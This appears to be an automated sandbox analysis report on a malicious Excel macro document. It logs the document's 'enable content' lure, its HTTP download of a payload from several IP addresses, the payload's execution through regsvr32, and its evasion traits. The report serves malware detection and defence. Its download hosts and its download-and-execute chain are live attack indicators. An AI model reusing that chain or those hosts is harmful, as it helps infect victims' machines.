Source: Decline-172917164-06242021.xlsm |
Virustotal: Detection: 17% |
Perma Link |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 5.253.62.174:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 5.253.62.174:80 |
Source: global traffic |
HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.253.62.174Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.234.247.7Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.117.73.74 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.234.247.7 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 5.253.62.174 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AD7B9C26.tif |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 5.253.62.174Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /44372.3504680556.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.234.247.7Connection: Keep-Alive |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: regsvr32.exe, 00000003.00000002.2235431852.0000000003AE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2216228540.0000000003A90000.00000002.00000001.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: regsvr32.exe, 00000003.00000002.2234626152.0000000001D20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2215271352.0000000001CF0000.00000002.00000001.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: regsvr32.exe, 00000003.00000002.2235431852.0000000003AE0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2216228540.0000000003A90000.00000002.00000001.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: regsvr32.exe, 00000003.00000002.2239296805.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2220106197.0000000004AB7000.00000002.00000001.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl |
Source: Document image extraction number: 0 |
Screenshot OCR: Enable Content button from the yellow bar above |
Source: Decline-172917164-06242021.xlsm |
Initial sample: EXEC |
Source: regsvr32.exe, 00000003.00000002.2239080229.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2219822034.00000000048D0000.00000002.00000001.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal72.expl.evad.winXLSM@7/7@0/3 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$Decline-172917164-06242021.xlsm |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVRCCD0.tmp |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: Decline-172917164-06242021.xlsm |
Virustotal: Detection: 17% |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1 |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2 |
Jump to behavior |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: Decline-172917164-06242021.xlsm |
Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels |
Source: Decline-172917164-06242021.xlsm |
Initial sample: OLE zip file path = xl/calcChain.xml |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 2228 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 532 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |
Source: C:\Windows\System32\regsvr32.exe TID: 2592 |
Thread sleep time: -60000s >= -30000s |
Jump to behavior |